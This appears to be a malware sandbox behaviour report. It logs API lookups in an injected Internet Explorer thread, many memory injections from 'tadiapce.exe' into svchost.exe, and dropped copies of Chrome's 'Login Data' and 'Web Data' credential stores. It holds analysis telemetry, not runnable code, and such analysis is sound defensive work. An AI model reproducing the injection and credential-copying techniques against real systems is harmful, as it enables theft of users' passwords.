Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76b6ed38	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76b63d01	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x76b5cdcf	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TerminateProcess, address_out = 0x76b52331	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76b676b5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76b5bb9f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76b5cac4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76b5bb80	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76b62fde	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeSListHead, address_out = 0x77395eeb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStartupInfoW, address_out = 0x76b63891	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleW, address_out = 0x76b6374d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InterlockedExchange, address_out = 0x76b5bf0a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualFree, address_out = 0x76b61da4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x76b62fb6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x76b6395c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualProtectEx, address_out = 0x76b9f5d9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76b633f6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcmpiA, address_out = 0x76b52249	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x76b5bbd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x7739ff51	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x77382dd6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x76b61280	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x76b48c59	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcpyA, address_out = 0x76b59793	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSize, address_out = 0x77389bec	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InterlockedFlushSList, address_out = 0x77383129	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = RtlUnwind, address_out = 0x76b47f70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x76b5bf00	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetLastError, address_out = 0x76b5bb08	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = EnterCriticalSection, address_out = 0x773777a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77377760	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77389ac5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76b63939	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsAlloc, address_out = 0x76b635a1	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsGetValue, address_out = 0x76b5da70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsSetValue, address_out = 0x76b5da88	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsFree, address_out = 0x76b613b8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeLibrary, address_out = 0x76b5d9d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryExW, address_out = 0x76b54775	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = RaiseException, address_out = 0x76b4eb60	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ExitProcess, address_out = 0x76b6214f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76b53e39	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76b6452b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76b6450e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringW, address_out = 0x76b613d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindClose, address_out = 0x76b60e62	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindFirstFileExA, address_out = 0x76b9f3ef	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindNextFileA, address_out = 0x76b5a187	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsValidCodePage, address_out = 0x76b6c1c0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetACP, address_out = 0x76b639aa	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetOEMCP, address_out = 0x76b53db9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCPInfo, address_out = 0x76b61e2e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x76b698ff	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineW, address_out = 0x76b6679e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76b61dbc	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76b61dc3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStdHandle, address_out = 0x76b61e46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileType, address_out = 0x76b675a5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStringTypeW, address_out = 0x76b667c8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetStdHandle, address_out = 0x76b9f589	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteFile, address_out = 0x76b61400	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlushFileBuffers, address_out = 0x76b47f81	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetConsoleCP, address_out = 0x76b62c8a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetConsoleMode, address_out = 0x76b62412	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetFilePointerEx, address_out = 0x76b4f5b2	1	Fn
Module	Load	module_name = WS2_32.dll, base_address = 0x75a90000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = WSAIoctl, address_out = 0x75a92fe7	1	Fn
Module	Load	module_name = SHLWAPI.dll, base_address = 0x771d0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = PathFindFileNameA, address_out = 0x771e00aa	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrChrA, address_out = 0x771dc5e6	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:21 (UTC)	1	Fn
System	Get Time	type = Performance Ctr, time = 26765669733	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x6c330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x6c330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76b61e16	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Module	Load	module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0	2	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x76b9f72b	1	Fn
Module	Get Filename	module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\program files\internet explorer\iexplore.exe, file_name_orig = C:\Program Files\Internet Explorer\iexplore.exe, size = 260	1	Fn
Environment	Get Environment String	-	1	Fn Data

Thread 0xba4

Category	Operation	Information	Count	Logfile
Module	Get Filename	module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\program files\internet explorer\iexplore.exe, file_name_orig = C:\Program Files\Internet Explorer\iexplore.exe, size = 260	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = connect, address_out = 0x75a96bdd	1	Fn
Module	Load	module_name = Ws2_32.dll, base_address = 0x75a90000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertGetCertificateChain, address_out = 0x75626ccf	1	Fn
Module	Load	module_name = crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertVerifyCertificateChainPolicy, address_out = 0x7562cae2	1	Fn
Module	Load	module_name = crypt32.dll, base_address = 0x75610000	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Module	Get Handle	module_name = c:\program files\internet explorer\iexplore.exe, base_address = 0xc50000	1	Fn

Process #38: svchost.exe

773

Information	Value
ID	#38
File Name	c:\windows\system32\svchost.exe
Command Line	svchost.exe
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:03:17, Reason: Child Process
Unmonitor	End Time: 00:04:16, Reason: Terminated by Timeout
Monitor Duration	00:00:59

OS Process Information

Information	Value
PID	0x6d8
Parent PID	0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 524 0x 154 0x 684 0x 788 0x 74C 0x 7D0 0x D04 0x DD8 0x DC4

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x50000, size = 367	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x60000, size = 112	62	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x602104, size = 12	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10000000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10001000, size = 822784	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca000, size = 145920	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ee000, size = 117248	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1010e000, size = 512	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1010f000, size = 1024	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10110000, size = 512	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10111000, size = 29696	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 26	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 12	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 19	6	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 16	57	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca088, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca08c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 16	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca090, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 13	7	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca094, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 9	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca098, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 20	5	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca09c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0a0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 15	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0a4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 18	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0a8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0ac, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 21	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0b0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0b4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0b8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 12	10	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0bc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 22	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0c0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 14	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0c4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0c8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0cc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0d0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0d4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 10	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0d8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0dc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0e0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 11	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0e4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0e8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0ec, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0f0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0f4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0f8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca0fc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca100, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca104, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 24	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca108, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca10c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca110, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca114, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca118, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca11c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca120, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 17	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca124, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca128, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca12c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca130, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca134, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca138, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca13c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca140, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca144, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 25	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca148, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 28	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca14c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca150, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca154, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca158, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca15c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca160, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca164, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100ca168, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x360000, size = 388	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x470000, size = 40	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 6	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x470000, size = 747	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x510000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x520000, size = 128	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x540000, size = 44	1	Fn Data

Dropped Files

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak	18.00 KB	MD5: 89d7b9ad36ca7345933c7e369ba0a5f4 SHA1: 78f072d00227314570b0e0f721690856b4e2fb4f SHA256: 2ade5f90626dbc3bc778a35ce4b28b0dcb28f2852fbf7dcc15506e0501642f1a SSDeep: 24:LLilH0KL7G0TMJHUyyJtmCm0XKY6lOKQAE9V8MffD4fOzeCmly6UwcpYMQW:kz+JH3yJUheCVE9V8MX0PFlNU1uW		... File Actions Show Properties Download
C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak	64.00 KB	MD5: e3a002935a782f75c8ac7f3f0505d7f2 SHA1: 5ec603207a726efa249b6ef575b2d03c64e928fd SHA256: 912c041f1f45b8b817f94c84c15433a40463a8a56d6978cf08b7ed28996050a7 SSDeep: 96:Ze3Zht6YnMvqI738Hsa/NTIdEFaEdUDSuKn8Y/qBOnxjyWTJereWb3Ds4Blr:ZkZLHMEhTJMb3D		... File Actions Show Properties Download

Threads

Thread 0x524

473

Category	Operation	Information	Count	Logfile
Module	Load	module_name = KERNEL32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileAttributesW, address_out = 0x76b664ff	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76b5bb80	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = UnmapViewOfFile, address_out = 0x76b5db13	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapValidate, address_out = 0x76b525dd	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSize, address_out = 0x77389bec	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76b6452b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTempPathA, address_out = 0x76b76a65	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FormatMessageW, address_out = 0x76b554a3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetDiskFreeSpaceA, address_out = 0x76b6d7d2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileAttributesA, address_out = 0x76b61de6	1	Fn
